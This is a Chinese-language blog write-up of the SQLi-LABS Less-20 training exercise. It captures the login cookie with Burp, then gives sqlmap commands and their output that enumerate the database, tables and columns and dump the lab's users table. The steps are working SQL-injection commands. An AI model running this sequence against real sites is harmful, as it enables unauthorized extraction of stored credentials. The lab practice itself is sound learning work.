jjnoob

cookie-injections-sqlmap

2019-05-21
jjnoob

题目地址: SQLi-LABS Page-1(Basic Challenges) -> Less-20

cookie

用户和密码都输入admin

burp抓包, proxy里面查看cookie:

GET /Less-20/index.php HTTP/1.1
Host: 43.247.91.228:84
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://43.247.91.228:84/Less-20/index.php
Connection: keep-alive
Cookie: uname=admin
Upgrade-Insecure-Requests: 1

登陆的cookie是uname=admin


sqlmap

尝试

sqlmap.py -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" --level=2
  • HTTP Cookie在level为2及以上的时候会测试.
  • HTTP User-Agent/Referer头在level为3及以上的时候会测试.

返回:

web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.5

爆库

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" --level=2 --current-db

返回:

current database: 'security'

爆表

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security --tables --level=2

返回:

Database: security
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

爆字段

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security -T users --columns --level=2

返回:

Database: security
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

查看字段信息

sqlmap -u "http://43.247.91.228:84/Less-20/index.php" --cookie "uname=admin" -D security -T users -C password,username --level=2 --dump

返回:

Database: security
Table: users
[13 entries]
+------------+----------+
| password   | username |
+------------+----------+
| Dumb       | Dumb     |
| I-kill-you | Angelina |
| p@ssword   | Dummy    |
| crappy     | secure   |
| stupidity  | stupid   |
| genious    | superman |
| mob!le     | batman   |
| admin      | admin    |
| admin1     | admin1   |
| admin2     | admin2   |
| admin3     | admin3   |
| dumbo      | dhakkan  |
| admin4     | admin4   |
+------------+----------+

上一篇 sqlmap-learning2

下一篇 wireshark-learning

Content